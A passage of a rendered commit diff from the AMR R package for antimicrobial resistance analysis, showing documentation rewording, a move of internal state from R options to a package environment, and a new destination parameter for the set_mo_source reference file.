`#' - All `r format_included_data_number(microorganisms[which(microorganisms\\$kingdom == \"Animalia\"), ])` (sub)species from `r format_included_data_number(microorganisms[which(microorganisms\\$kingdom == \"Animalia\"), \"genus\"])` other relevant genera from the kingdom of Animalia (such as *Strongyloides* and *Taenia*)` `#' - All `r format_included_data_number(microorganisms.old)` previously accepted names of all included (sub)species (these were taxonomically renamed)` `#' - The complete taxonomic tree of all included (sub)species: from kingdom to subspecies` `#' - The responsible author(s) and year of scientific publication`\n\n#### 4 R/data.R Unescape Escape View File\n\n `@ -25,10 +25,10 @@` ``` ``` `#' Data sets with `r format(nrow(antibiotics) + nrow(antivirals), big.mark = \",\")` antimicrobials` `#'` `#' Two data sets containing all antibiotics/antimycotics and antivirals. Use [as.ab()] or one of the [ab_property()] functions to retrieve values from the [antibiotics] data set. Three identifiers are included in this data set: an antibiotic ID (`ab`, primarily used in this package) as defined by WHONET/EARS-Net, an ATC code (`atc`) as defined by the WHO, and a Compound ID (`cid`) as found in PubChem. Other properties in this data set are derived from one or more of these codes.` `#' Two data sets containing all antibiotics/antimycotics and antivirals. Use [as.ab()] or one of the [`ab_*`][ab_property()] functions to retrieve values from the [antibiotics] data set. Three identifiers are included in this data set: an antibiotic ID (`ab`, primarily used in this package) as defined by WHONET/EARS-Net, an ATC code (`atc`) as defined by the WHO, and a Compound ID (`cid`) as found in PubChem. Other properties in this data set are derived from one or more of these codes.` `#' @format` `#' ### For the [antibiotics] data set: a [data.frame] with `r nrow(antibiotics)` observations and `r ncol(antibiotics)` variables:` `#' - `ab`\\cr Antibiotic ID as used in this package (like `AMC`), using the official EARS-Net (European Antimicrobial Resistance Surveillance Network) codes where available` `#' - `ab`\\cr Antibiotic ID as used in this package (such as `AMC`), using the official EARS-Net (European Antimicrobial Resistance Surveillance Network) codes where available` `#' - `atc`\\cr ATC code (Anatomical Therapeutic Chemical) as defined by the WHOCC, like `J01CR02`` `#' - `cid`\\cr Compound ID as found in PubChem` `#' - `name`\\cr Official name as used by WHONET/EARS-Net or the WHO`\n\n#### 11 R/disk.R Unescape Escape View File\n\n `@ -114,8 +114,9 @@ all_valid_disks <- function(x) {` ` if (!inherits(x, c(\"disk\", \"character\", \"numeric\", \"integer\"))) {` ` return(FALSE)` ` }` ` x_disk <- suppressWarnings(as.disk(x[!is.na(x)]))` ` !any(is.na(x_disk)) & !all(is.na(x))` ` x_disk <- tryCatch(suppressWarnings(as.disk(x[!is.na(x)])),` ` error = function(e) NA)` ` !any(is.na(x_disk)) && !all(is.na(x))` `}` ``` ``` `#' @rdname as.disk` `@ -223,14 +224,12 @@ unique.disk <- function(x, incomparables = FALSE, ...) {` ``` ``` `# will be exported using s3_register() in R/zzz.R` `get_skimmers.disk <- function(column) {` ` sfl <- import_fn(\"sfl\", \"skimr\", error_on_fail = FALSE)` ` inline_hist <- import_fn(\"inline_hist\", \"skimr\", error_on_fail = FALSE)` ` sfl(` ` skimr::sfl(` ` skim_type = \"disk\",` ` min = ~min(as.double(.), na.rm = TRUE),` ` max = ~max(as.double(.), na.rm = TRUE),` ` median = ~stats::median(as.double(.), na.rm = TRUE),` ` n_unique = ~pm_n_distinct(., na.rm = TRUE),` ` hist = ~inline_hist(stats::na.omit(as.double(.)))` ` hist = ~skimr::inline_hist(stats::na.omit(as.double(.)))` ` )` `}`\n\n#### 2 R/first_isolate.R Unescape Escape View File\n\n `@ -31,7 +31,7 @@` `#' @param col_date column name of the result date (or date that is was received on the lab), defaults to the first column with a date class` `#' @param col_patient_id column name of the unique IDs of the patients, defaults to the first column that starts with 'patient' or 'patid' (case insensitive)` `#' @param col_mo column name of the IDs of the microorganisms (see [as.mo()]), defaults to the first column of class [`mo`]. Values will be coerced using [as.mo()].` `#' @param col_testcode column name of the test codes. Use `col_testcode = NULL` to **not** exclude certain test codes (like test codes for screening). In that case `testcodes_exclude` will be ignored.` `#' @param col_testcode column name of the test codes. Use `col_testcode = NULL` to **not** exclude certain test codes (such as test codes for screening). In that case `testcodes_exclude` will be ignored.` `#' @param col_specimen column name of the specimen type or group` `#' @param col_icu column name of the logicals (`TRUE`/`FALSE`) whether a ward or department is an Intensive Care Unit (ICU)` `#' @param col_keyantibiotics column name of the key antibiotics to determine first *weighted* isolates, see [key_antibiotics()]. Defaults to the first column that starts with 'key' followed by 'ab' or 'antibiotics' (case insensitive). Use `col_keyantibiotics = FALSE` to prevent this.`\n\n#### 4 R/g.test.R Unescape Escape View File\n\n `@ -34,7 +34,7 @@` `#'` `#' The p-value is computed from the asymptotic chi-squared distribution of the test statistic.` `#'` `#' In the contingency table case simulation is done by random sampling from the set of all contingency tables with given marginals, and works only if the marginals are strictly positive. Note that this is not the usual sampling situation assumed for a chi-squared test (like the *G*-test) but rather that for Fisher's exact test.` `#' In the contingency table case simulation is done by random sampling from the set of all contingency tables with given marginals, and works only if the marginals are strictly positive. Note that this is not the usual sampling situation assumed for a chi-squared test (such as the *G*-test) but rather that for Fisher's exact test.` `#'` `#' In the goodness-of-fit case simulation is done by random sampling from the discrete distribution specified by `p`, each sample being of size `n = sum(x)`. This simulation is done in \\R and may be slow.` `#' ` `@ -144,7 +144,7 @@ g.test <- function(x,` ` DNAME <- paste(paste(DNAME, collapse = \"\\n\"), \"and\",` ` paste(DNAME2, collapse = \"\\n\"))` ` }` ` if (any(x < 0) || anyNA(x))` ` if (any(x < 0) || any(is.na((x)))) # this last one was anyNA, but only introduced in R 3.1.0` ` stop(\"all entries of 'x' must be nonnegative and finite\")` ` if ((n <- sum(x)) == 0)` ` stop(\"at least one entry of 'x' must be positive\")`\n\n#### 3 R/globals.R Unescape Escape View File\n\n `@ -23,8 +23,7 @@` `# how to conduct AMR analysis: https://msberends.github.io/AMR/ #` `# ==================================================================== #` ``` ``` `globalVariables(c(\"...length\", # for pm_group_split() on R 3.3` ` \".rowid\",` `globalVariables(c(\".rowid\",` ` \"ab\",` ` \"ab_txt\",` ` \"angle\",`\n\n#### 2 R/join_microorganisms.R Unescape Escape View File\n\n `@ -31,7 +31,7 @@` `#' @name join` `#' @aliases join inner_join` `#' @param x existing table to join, or character vector` `#' @param by a variable to join by - if left empty will search for a column with class [`mo`] (created with [as.mo()]) or will be `\"mo\"` if that column name exists in `x`, could otherwise be a column name of `x` with values that exist in `microorganisms\\$mo` (like `by = \"bacteria_id\"`), or another column in [microorganisms] (but then it should be named, like `by = c(\"bacteria_id\" = \"fullname\")`)` `#' @param by a variable to join by - if left empty will search for a column with class [`mo`] (created with [as.mo()]) or will be `\"mo\"` if that column name exists in `x`, could otherwise be a column name of `x` with values that exist in `microorganisms\\$mo` (such as `by = \"bacteria_id\"`), or another column in [microorganisms] (but then it should be named, like `by = c(\"bacteria_id\" = \"fullname\")`)` `#' @param suffix if there are non-joined duplicate variables in `x` and `y`, these suffixes will be added to the output to disambiguate them. Should be a character vector of length 2.` `#' @param ... ignored` `#' @details **Note:** As opposed to the `join()` functions of `dplyr`, [character] vectors are supported and at default existing columns will get a suffix `\"2\"` and the newly joined columns will not get a suffix. `\n\n#### 10 R/mic.R Unescape Escape View File\n\n `@ -142,7 +142,7 @@ all_valid_mics <- function(x) {` ` }` ` x_mic <- tryCatch(suppressWarnings(as.mic(x[!is.na(x)])),` ` error = function(e) NA)` ` !any(is.na(x_mic)) & !all(is.na(x))` ` !any(is.na(x_mic)) && !all(is.na(x))` `}` ``` ``` `#' @rdname as.mic` `@ -175,7 +175,7 @@ as.numeric.mic <- function(x, ...) {` `#' @method droplevels mic` `#' @export` `#' @noRd` `droplevels.mic <- function(x, exclude = ifelse(anyNA(levels(x)), NULL, NA), ...) {` `droplevels.mic <- function(x, exclude = if (any(is.na(levels(x)))) NULL else NA, ...) {` ` x <- droplevels.factor(x, exclude = exclude, ...)` ` class(x) <- c(\"mic\", \"ordered\", \"factor\")` ` x` `@ -323,14 +323,12 @@ unique.mic <- function(x, incomparables = FALSE, ...) {` ``` ``` `# will be exported using s3_register() in R/zzz.R` `get_skimmers.mic <- function(column) {` ` sfl <- import_fn(\"sfl\", \"skimr\", error_on_fail = FALSE)` ` inline_hist <- import_fn(\"inline_hist\", \"skimr\", error_on_fail = FALSE)` ` sfl(` ` skimr::sfl(` ` skim_type = \"mic\",` ` min = ~as.character(sort(stats::na.omit(.))),` ` max = ~as.character(sort(stats::na.omit(.))[length(stats::na.omit(.))]),` ` median = ~as.character(stats::na.omit(.)[as.double(stats::na.omit(.)) == median(as.double(stats::na.omit(.)))]),` ` n_unique = ~pm_n_distinct(., na.rm = TRUE),` ` hist_log2 = ~inline_hist(log2(as.double(stats::na.omit(.))))` ` hist_log2 = ~skimr::inline_hist(log2(as.double(stats::na.omit(.))))` ` )` `}`\n\n#### 107 R/mo.R Unescape Escape View File\n\n `@ -25,7 +25,7 @@` ``` ``` `#' Transform input to a microorganism ID` `#'` `#' Use this function to determine a valid microorganism ID ([`mo`]). Determination is done using intelligent rules and the complete taxonomic kingdoms Bacteria, Chromista, Protozoa, Archaea and most microbial species from the kingdom Fungi (see Source). The input can be almost anything: a full name (like `\"Staphylococcus aureus\"`), an abbreviated name (like `\"S. aureus\"`), an abbreviation known in the field (like `\"MRSA\"`), or just a genus. Please see *Examples*.` `#' Use this function to determine a valid microorganism ID ([`mo`]). Determination is done using intelligent rules and the complete taxonomic kingdoms Bacteria, Chromista, Protozoa, Archaea and most microbial species from the kingdom Fungi (see Source). The input can be almost anything: a full name (like `\"Staphylococcus aureus\"`), an abbreviated name (such as `\"S. aureus\"`), an abbreviation known in the field (such as `\"MRSA\"`), or just a genus. Please see *Examples*.` `#' @inheritSection lifecycle Stable lifecycle` `#' @param x a character vector or a [data.frame] with one or two columns` `#' @param Becker a logical to indicate whether staphylococci should be categorised into coagulase-negative staphylococci (\"CoNS\") and coagulase-positive staphylococci (\"CoPS\") instead of their own species, according to Karsten Becker *et al.* (1,2,3).` `@ -111,7 +111,7 @@` `#' @return A [character] [vector] with additional class [`mo`]` `#' @seealso [microorganisms] for the [data.frame] that is being used to determine ID's.` `#'` `#' The [mo_property()] functions (like [mo_genus()], [mo_gramstain()]) to get properties based on the returned code.` `#' The [`mo_*`][mo_property()] functions (such as [mo_genus()], [mo_gramstain()]) to get properties based on the returned code.` `#' @inheritSection AMR Reference data publicly available` `#' @inheritSection AMR Read more on our website!` `#' @examples` `@ -199,10 +199,10 @@ as.mo <- function(x,` ` x[trimws2(x) %like% paste0(\"^(\", translate_AMR(\"no|not\", language = language), \") [a-z]+\")] <- \"UNKNOWN\"` ` uncertainty_level <- translate_allow_uncertain(allow_uncertain)` ``` ``` ` if (mo_source_isvalid(reference_df)` ` if (!is.null(reference_df)` ` && mo_source_isvalid(reference_df)` ` && isFALSE(Becker)` ` && isFALSE(Lancefield)` ` && !is.null(reference_df)` ` && all(x %in% unlist(reference_df), na.rm = TRUE)) {` ``` ``` ` reference_df <- repair_reference_df(reference_df)` `@ -358,11 +358,11 @@ exec_as.mo <- function(x,` ` x[trimws2(x) %like% paste0(\"^(\", translate_AMR(\"no|not\", language = language), \") [a-z]+\")] <- \"UNKNOWN\"` ``` ``` ` if (initial_search == TRUE) {` ` options(mo_failures = NULL)` ` options(mo_uncertainties = NULL)` ` options(mo_renamed = NULL)` ` mo_env\\$mo_failures <- NULL` ` mo_env\\$mo_uncertainties <- NULL` ` mo_env\\$mo_renamed <- NULL` ` }` ` options(mo_renamed_last_run = NULL)` ` mo_env\\$mo_renamed_last_run <- NULL` ``` ``` ` failures <- character(0)` ` uncertainty_level <- translate_allow_uncertain(allow_uncertain)` `@ -595,7 +595,7 @@ exec_as.mo <- function(x,` ` } else {` ` x[i] <- lookup(fullname == found[\"fullname_new\"], haystack = MO_lookup)` ` }` ` options(mo_renamed_last_run = found[\"fullname\"])` ` mo_env\\$mo_renamed_last_run <- found[\"fullname\"]` ` was_renamed(name_old = found[\"fullname\"],` ` name_new = lookup(fullname == found[\"fullname_new\"], \"fullname\", haystack = MO_lookup),` ` ref_old = found[\"ref\"],` `@ -970,7 +970,7 @@ exec_as.mo <- function(x,` ` } else {` ` x[i] <- lookup(fullname == found[\"fullname_new\"], haystack = MO_lookup)` ` }` ` options(mo_renamed_last_run = found[\"fullname\"])` ` mo_env\\$mo_renamed_last_run <- found[\"fullname\"]` ` was_renamed(name_old = found[\"fullname\"],` ` name_new = lookup(fullname == found[\"fullname_new\"], \"fullname\", haystack = MO_lookup),` ` ref_old = found[\"ref\"],` `@ -1022,7 +1022,7 @@ exec_as.mo <- function(x,` ` ref_old = found[\"ref\"],` ` ref_new = lookup(fullname == found[\"fullname_new\"], \"ref\", haystack = MO_lookup),` ` mo = lookup(fullname == found[\"fullname_new\"], \"mo\", haystack = MO_lookup))` ` options(mo_renamed_last_run = found[\"fullname\"])` ` mo_env\\$mo_renamed_last_run <- found[\"fullname\"]` ` uncertainties <<- rbind(uncertainties,` ` format_uncertainty_as_df(uncertainty_level = now_checks_for_uncertainty_level,` ` input = a.x_backup,` `@ -1393,7 +1393,7 @@ exec_as.mo <- function(x,` ` # handling failures ----` ` failures <- failures[!failures %in% c(NA, NULL, NaN)]` ` if (length(failures) > 0 & initial_search == TRUE) {` ` options(mo_failures = sort(unique(failures)))` ` mo_env\\$mo_failures <- sort(unique(failures))` ` plural <- c(\"value\", \"it\", \"was\")` ` if (pm_n_distinct(failures) > 1) {` ` plural <- c(\"values\", \"them\", \"were\")` `@ -1420,7 +1420,7 @@ exec_as.mo <- function(x,` ` # handling uncertainties ----` ` if (NROW(uncertainties) > 0 & initial_search == TRUE) {` ` uncertainties <- as.list(pm_distinct(uncertainties, input, .keep_all = TRUE))` ` options(mo_uncertainties = uncertainties)` ` mo_env\\$mo_uncertainties <- uncertainties` ``` ``` ` plural <- c(\"\", \"it\", \"was\")` ` if (length(uncertainties\\$input) > 1) {` `@ -1540,13 +1540,13 @@ was_renamed <- function(name_old, name_new, ref_old = \"\", ref_new = \"\", mo = \"\")` ` new_ref = ref_new,` ` mo = mo,` ` stringsAsFactors = FALSE)` ` already_set <- getOption(\"mo_renamed\")` ` already_set <- mo_env\\$mo_renamed` ` if (!is.null(already_set)) {` ` options(mo_renamed = rbind(already_set,` ` mo_env\\$mo_renamed = rbind(already_set,` ` newly_set,` ` stringsAsFactors = FALSE))` ` stringsAsFactors = FALSE)` ` } else {` ` options(mo_renamed = newly_set)` ` mo_env\\$mo_renamed <- newly_set` ` }` `}` ``` ``` `@ -1554,9 +1554,9 @@ format_uncertainty_as_df <- function(uncertainty_level,` ` input,` ` result_mo,` ` candidates = NULL) {` ` if (!is.null(getOption(\"mo_renamed_last_run\", default = NULL))) {` ` fullname <- getOption(\"mo_renamed_last_run\")` ` options(mo_renamed_last_run = NULL)` ` if (!is.null(mo_env\\$mo_renamed_last_run)) {` ` fullname <- mo_env\\$mo_renamed_last_run` ` mo_env\\$mo_renamed_last_run <- NULL` ` renamed_to <- MO_lookup[match(result_mo, MO_lookup\\$mo), \"fullname\", drop = TRUE]` ` } else {` ` fullname <- MO_lookup[match(result_mo, MO_lookup\\$mo), \"fullname\", drop = TRUE]` `@ -1603,27 +1603,32 @@ freq.mo <- function(x, ...) {` ` if (is.null(digits)) {` ` digits <- 2` ` }` ` freq.default <- import_fn(\"freq.default\", \"cleaner\", error_on_fail = FALSE)` ` freq.default(x = x, ...,` ` .add_header = list(`Gram-negative` = paste0(format(sum(grams == \"Gram-negative\", na.rm = TRUE),` ` big.mark = \",\",` ` decimal.mark = \".\"),` ` \" (\", percentage(sum(grams == \"Gram-negative\", na.rm = TRUE) / length(grams), digits = digits),` ` \")\"),` ` `Gram-positive` = paste0(format(sum(grams == \"Gram-positive\", na.rm = TRUE),` ` big.mark = \",\",` ` decimal.mark = \".\"),` ` \" (\", percentage(sum(grams == \"Gram-positive\", na.rm = TRUE) / length(grams), digits = digits),` ` \")\"),` ` `Nr. of genera` = pm_n_distinct(mo_genus(x_noNA, language = NULL)),` ` `Nr. of species` = pm_n_distinct(paste(mo_genus(x_noNA, language = NULL),` ` mo_species(x_noNA, language = NULL)))))` ` cleaner::freq.default(` ` x = x,` ` ...,` ` .add_header = list(` ` `Gram-negative` = paste0(` ` format(sum(grams == \"Gram-negative\", na.rm = TRUE),` ` big.mark = \",\",` ` decimal.mark = \".\"),` ` \" (\", percentage(sum(grams == \"Gram-negative\", na.rm = TRUE) / length(grams),` ` digits = digits),` ` \")\"),` ` `Gram-positive` = paste0(` ` format(sum(grams == \"Gram-positive\", na.rm = TRUE),` ` big.mark = \",\",` ` decimal.mark = \".\"),` ` \" (\", percentage(sum(grams == \"Gram-positive\", na.rm = TRUE) / length(grams),` ` digits = digits),` ` \")\"),` ` `Nr. of genera` = pm_n_distinct(mo_genus(x_noNA, language = NULL)),` ` `Nr. of species` = pm_n_distinct(paste(mo_genus(x_noNA, language = NULL),` ` mo_species(x_noNA, language = NULL)))))` `}` ``` ``` `# will be exported using s3_register() in R/zzz.R` `get_skimmers.mo <- function(column) {` ` sfl <- import_fn(\"sfl\", \"skimr\", error_on_fail = FALSE)` ` sfl(` ` skimr::sfl(` ` skim_type = \"mo\",` ` unique_total = ~pm_n_distinct(., na.rm = TRUE),` ` gram_negative = ~sum(mo_is_gram_negative(stats::na.omit(.))),` `@ -1736,16 +1741,16 @@ unique.mo <- function(x, incomparables = FALSE, ...) {` `#' @rdname as.mo` `#' @export` `mo_failures <- function() {` ` getOption(\"mo_failures\")` ` mo_env\\$mo_failures` `}` ``` ``` `#' @rdname as.mo` `#' @export` `mo_uncertainties <- function() {` ` if (is.null(getOption(\"mo_uncertainties\"))) {` ` if (is.null(mo_env\\$mo_uncertainties)) {` ` return(NULL)` ` }` ` set_clean_class(as.data.frame(getOption(\"mo_uncertainties\"), ` ` set_clean_class(as.data.frame(mo_env\\$mo_uncertainties, ` ` stringsAsFactors = FALSE),` ` new_class = c(\"mo_uncertainties\", \"data.frame\"))` `}` `@ -1814,7 +1819,7 @@ print.mo_uncertainties <- function(x, ...) {` `#' @rdname as.mo` `#' @export` `mo_renamed <- function() {` ` items <- getOption(\"mo_renamed\", default = NULL)` ` items <- mo_env\\$mo_renamed` ` if (is.null(items)) {` ` items <- data.frame(stringsAsFactors = FALSE)` ` } else {` `@ -1878,20 +1883,20 @@ translate_allow_uncertain <- function(allow_uncertain) {` `}` ``` ``` `get_mo_failures_uncertainties_renamed <- function() {` ` remember <- list(failures = getOption(\"mo_failures\"),` ` uncertainties = getOption(\"mo_uncertainties\"),` ` renamed = getOption(\"mo_renamed\"))` ` remember <- list(failures = mo_env\\$mo_failures,` ` uncertainties = mo_env\\$mo_uncertainties,` ` renamed = mo_env\\$mo_renamed)` ` # empty them, otherwise mo_shortname(\"Chlamydophila psittaci\") will give 3 notes` ` options(\"mo_failures\" = NULL)` ` options(\"mo_uncertainties\" = NULL)` ` options(\"mo_renamed\" = NULL)` ` mo_env\\$mo_failures <- NULL` ` mo_env\\$mo_uncertainties <- NULL` ` mo_env\\$mo_renamed <- NULL` ` remember` `}` ``` ``` `load_mo_failures_uncertainties_renamed <- function(metadata) {` ` options(\"mo_failures\" = metadata\\$failures)` ` options(\"mo_uncertainties\" = metadata\\$uncertainties)` ` options(\"mo_renamed\" = metadata\\$renamed)` ` mo_env\\$mo_failures <- metadata\\$failures` ` mo_env\\$mo_uncertainties <- metadata\\$uncertainties` ` mo_env\\$mo_renamed <- metadata\\$renamed` `}` ``` ``` `trimws2 <- function(x) {` `@ -1978,3 +1983,5 @@ repair_reference_df <- function(reference_df) {` ` reference_df[, \"mo\"] <- as.mo(reference_df[, \"mo\", drop = TRUE])` ` reference_df` `}` ``` ``` `mo_env <- new.env(hash = FALSE)`\n\n#### 2 R/mo_property.R Unescape Escape View File\n\n `@ -38,7 +38,7 @@` `#' - `mo_ref(\"Escherichia blattae\")` will return `\"Burgess et al., 1973\"` (with a message about the renaming)` `#' - `mo_ref(\"Shimwellia blattae\")` will return `\"Priest et al., 2010\"` (without a message)` `#'` `#' The short name - [mo_shortname()] - almost always returns the first character of the genus and the full species, like `\"E. coli\"`. Exceptions are abbreviations of staphylococci (like *\"CoNS\"*, Coagulase-Negative Staphylococci) and beta-haemolytic streptococci (like *\"GBS\"*, Group B Streptococci). Please bear in mind that e.g. *E. coli* could mean *Escherichia coli* (kingdom of Bacteria) as well as *Entamoeba coli* (kingdom of Protozoa). Returning to the full name will be done using [as.mo()] internally, giving priority to bacteria and human pathogens, i.e. `\"E. coli\"` will be considered *Escherichia coli*. In other words, `mo_fullname(mo_shortname(\"Entamoeba coli\"))` returns `\"Escherichia coli\"`.` `#' The short name - [mo_shortname()] - almost always returns the first character of the genus and the full species, like `\"E. coli\"`. Exceptions are abbreviations of staphylococci (such as *\"CoNS\"*, Coagulase-Negative Staphylococci) and beta-haemolytic streptococci (such as *\"GBS\"*, Group B Streptococci). Please bear in mind that e.g. *E. coli* could mean *Escherichia coli* (kingdom of Bacteria) as well as *Entamoeba coli* (kingdom of Protozoa). Returning to the full name will be done using [as.mo()] internally, giving priority to bacteria and human pathogens, i.e. `\"E. coli\"` will be considered *Escherichia coli*. In other words, `mo_fullname(mo_shortname(\"Entamoeba coli\"))` returns `\"Escherichia coli\"`.` `#'` `#' Since the top-level of the taxonomy is sometimes referred to as 'kingdom' and sometimes as 'domain', the functions [mo_kingdom()] and [mo_domain()] return the exact same results.` `#'`\n\n#### 108 R/mo_source.R Unescape Escape View File\n\n `@ -30,16 +30,17 @@` `#' This is **the fastest way** to have your organisation (or analysis) specific codes picked up and translated by this package.` `#' @inheritSection lifecycle Stable lifecycle` `#' @param path location of your reference file, see Details. Can be `\"\"`, `NULL` or `FALSE` to delete the reference file.` `#' @param destination destination of the compressed data file, default to the user's home directory.` `#' @rdname mo_source` `#' @name mo_source` `#' @aliases set_mo_source get_mo_source` `#' @details The reference file can be a text file separated with commas (CSV) or tabs or pipes, an Excel file (either 'xls' or 'xlsx' format) or an R object file (extension '.rds'). To use an Excel file, you will need to have the `readxl` package installed.` `#'` `#' [set_mo_source()] will check the file for validity: it must be a [data.frame], must have a column named `\"mo\"` which contains values from [`microorganisms\\$mo`][microorganisms] and must have a reference column with your own defined values. If all tests pass, [set_mo_source()] will read the file into R and will ask to export it to `\"~/.mo_source.rds\"`. The CRAN policy disallows packages to write to the file system, although '*exceptions may be allowed in interactive sessions if the package obtains confirmation from the user*'. For this reason, this function only works in interactive sessions so that the user can **specifically confirm and allow** that this file will be created. ` `#' [set_mo_source()] will check the file for validity: it must be a [data.frame], must have a column named `\"mo\"` which contains values from [`microorganisms\\$mo`][microorganisms] and must have a reference column with your own defined values. If all tests pass, [set_mo_source()] will read the file into R and will ask to export it to `\"~/mo_source.rds\"`. The CRAN policy disallows packages to write to the file system, although '*exceptions may be allowed in interactive sessions if the package obtains confirmation from the user*'. For this reason, this function only works in interactive sessions so that the user can **specifically confirm and allow** that this file will be created. The destination of this file can be set with the `destination` parameter and defaults to the user's home directory. It can also be set as an \\R option, using `options(AMR_mo_source = \"my/location/file.rds)`.` `#' ` `#' The created compressed data file `\"~/.mo_source.rds\"` will be used at default for MO determination (function [as.mo()] and consequently all `mo_*` functions like [mo_genus()] and [mo_gramstain()]). The location of the original file will be saved as an R option with `options(mo_source = path)`. Its timestamp will be saved with `options(mo_source_datetime = ...)`. ` `#' The created compressed data file `\"mo_source.rds\"` will be used at default for MO determination (function [as.mo()] and consequently all `mo_*` functions like [mo_genus()] and [mo_gramstain()]). The location and timestamp of the original file will be saved as an attribute to the compressed data file. ` `#' ` `#' The function [get_mo_source()] will return the data set by reading `\"~/.mo_source.rds\"` with [readRDS()]. If the original file has changed (by checking the aforementioned options `mo_source` and `mo_source_datetime`), it will call [set_mo_source()] to update the data file automatically if used in an interactive session.` `#' The function [get_mo_source()] will return the data set by reading `\"mo_source.rds\"` with [readRDS()]. If the original file has changed (by checking the location and timestamp of the original file), it will call [set_mo_source()] to update the data file automatically if used in an interactive session.` `#'` `#' Reading an Excel file (`.xlsx`) with only one row has a size of 8-9 kB. The compressed file created with [set_mo_source()] will then have a size of 0.1 kB and can be read by [get_mo_source()] in only a couple of microseconds (millionths of a second).` `#' ` `@ -60,16 +61,18 @@` `#' ` `#' ```` `#' set_mo_source(\"home/me/ourcodes.xlsx\")` `#' #> NOTE: Created mo_source file '~/.mo_source.rds' from 'home/me/ourcodes.xlsx'` `#' #> (columns \"Organisation XYZ\" and \"mo\")` `#' #> NOTE: Created mo_source file '/Users/me/mo_source.rds' (0.3 kB) from` `#' #> '/Users/me/Documents/ourcodes.xlsx' (9 kB), columns ` `#' #> \"Organisation XYZ\" and \"mo\"` `#' ```` `#'` `#' It has now created a file `\"~/.mo_source.rds\"` with the contents of our Excel file. Only the first column with foreign values and the 'mo' column will be kept when creating the RDS file.` `#' It has now created a file `\"~/mo_source.rds\"` with the contents of our Excel file. Only the first column with foreign values and the 'mo' column will be kept when creating the RDS file.` `#'` `#' And now we can use it in our functions:` `#' ` `#' ```` `#' as.mo(\"lab_mo_ecoli\")` `#' #> Class ` `#' #> B_ESCHR_COLI` `#'` `#' mo_genus(\"lab_mo_kpneumoniae\")` `@ -77,6 +80,9 @@` `#'` `#' # other input values still work too` `#' as.mo(c(\"Escherichia coli\", \"E. coli\", \"lab_mo_ecoli\"))` `#' #> NOTE: Translation to one microorganism was guessed with uncertainty.` `#' #> Use mo_uncertainties() to review it.` `#' #> Class ` `#' #> B_ESCHR_COLI B_ESCHR_COLI B_ESCHR_COLI` `#' ```` `#'` `@ -96,8 +102,10 @@` `#' ` `#' ```` `#' as.mo(\"lab_mo_ecoli\")` `#' #> NOTE: Updated mo_source file '~/.mo_source.rds' from 'home/me/ourcodes.xlsx'` `#' #> (columns \"Organisation XYZ\" and \"mo\")` `#' #> NOTE: Updated mo_source file '/Users/me/mo_source.rds' (0.3 kB) from ` `#' #> '/Users/me/Documents/ourcodes.xlsx' (9 kB), columns` `#' #> \"Organisation XYZ\" and \"mo\"` `#' #> Class ` `#' #> B_ESCHR_COLI` `#'` `#' mo_genus(\"lab_Staph_aureus\")` `@ -108,25 +116,26 @@` `#' ` `#' ```` `#' set_mo_source(NULL)` `#' # Removed mo_source file '~/.mo_source.rds'.` `#' #> Removed mo_source file '/Users/me/mo_source.rds'` `#' ```` `#' ` `#' If the original Excel file is moved or deleted, the mo_source file will be removed upon the next use of [as.mo()]. If the mo_source file is manually deleted (i.e. without using [set_mo_source()]), the references to the mo_source file will be removed upon the next use of [as.mo()].` `#' If the original Excel file is moved or deleted, the mo_source file will be removed upon the next use of [as.mo()].` `#' @export` `#' @inheritSection AMR Read more on our website!` `set_mo_source <- function(path) {` ` meet_criteria(path, allow_class = \"character\", has_length = 1)` `set_mo_source <- function(path, destination = getOption(\"AMR_mo_source\", \"~/mo_source.rds\")) {` ` meet_criteria(path, allow_class = \"character\", has_length = 1, allow_NULL = TRUE)` ` meet_criteria(destination, allow_class = \"character\", has_length = 1)` ` stop_ifnot(destination %like% \"[.]rds\\$\", \"the `destination` must be a file location with file extension .rds\")` ` ` ` file_location <- path.expand(\"~/mo_source.rds\")` ` mo_source_destination <- path.expand(destination)` ` ` ` stop_ifnot(interactive(), \"This function can only be used in interactive mode, since it must ask for the user's permission to write a file to their home folder.\")` ``` ``` ` if (is.null(path) || path %in% c(FALSE, \"\")) {` ` options(mo_source = NULL)` ` options(mo_source_timestamp = NULL)` ` if (file.exists(file_location)) {` ` unlink(file_location)` ` message_(\"Removed mo_source file '\", font_bold(file_location), \"'\",` ` mo_env\\$mo_source <- NULL` ` if (file.exists(mo_source_destination)) {` ` unlink(mo_source_destination)` ` message_(\"Removed mo_source file '\", font_bold(mo_source_destination), \"'\",` ` add_fn = font_red,` ` as_note = FALSE)` ` }` `@ -178,16 +187,19 @@ set_mo_source <- function(path) {` ` }` ` ` ` df <- as.data.frame(df, stringAsFactors = FALSE)` ` df[, \"mo\"] <- set_clean_class(df[, \"mo\", drop = TRUE], c(\"mo\", \"character\"))` ` ` ` # success` ` if (file.exists(file_location)) {` ` if (file.exists(mo_source_destination)) {` ` action <- \"Updated\"` ` } else {` ` action <- \"Created\"` ` # only ask when file is created, not when it is updated` ` txt <- paste0(\"This will write create the new file '\", ` ` file_location, ` ` \"', for which your permission is needed.\\n\\nDo you agree that this file will be created? \")` ` txt <- paste0(word_wrap(paste0(\"This will write create the new file '\", ` ` mo_source_destination, ` ` \"', for which your permission is needed.\")),` ` \"\\n\\n\",` ` word_wrap(\"Do you agree that this file will be created?\"))` ` if (\"rsasdtudioapi\" %in% rownames(utils::installed.packages())) {` ` showQuestion <- import_fn(\"showQuestion\", \"rstudioapi\")` ` q_continue <- showQuestion(\"Create new file in home directory\", txt)` `@ -198,42 +210,38 @@ set_mo_source <- function(path) {` ` return(invisible())` ` }` ` }` ` saveRDS(df, file_location)` ` options(mo_source = path)` ` options(mo_source_timestamp = as.character(file.info(path)\\$mtime))` ` message_(action, \" mo_source file '\", font_bold(file_location), \"'\",` ` \" from '\", font_bold(path), \"'\",` ` '(columns \"', colnames(df), '\" and \"', colnames(df), '\")')` ` attr(df, \"mo_source_location\") <- path` ` attr(df, \"mo_source_timestamp\") <- file.mtime(path)` ` saveRDS(df, mo_source_destination)` ` mo_env\\$mo_source <- df` ` message_(action, \" mo_source file '\", font_bold(mo_source_destination),` ` \"' (\", formatted_filesize(mo_source_destination),` ` \") from '\", font_bold(path),` ` \"' (\", formatted_filesize(path),` ` '), columns \"', colnames(df), '\" and \"', colnames(df), '\"')` `}` ``` ``` `#' @rdname mo_source` `#' @export` `get_mo_source <- function() {` ` if (is.null(getOption(\"mo_source\", NULL))) {` `get_mo_source <- function(destination = getOption(\"AMR_mo_source\", \"~/mo_source.rds\")) {` ` if (!file.exists(path.expand(destination))) {` ` if (interactive()) {` ` # source file might have been 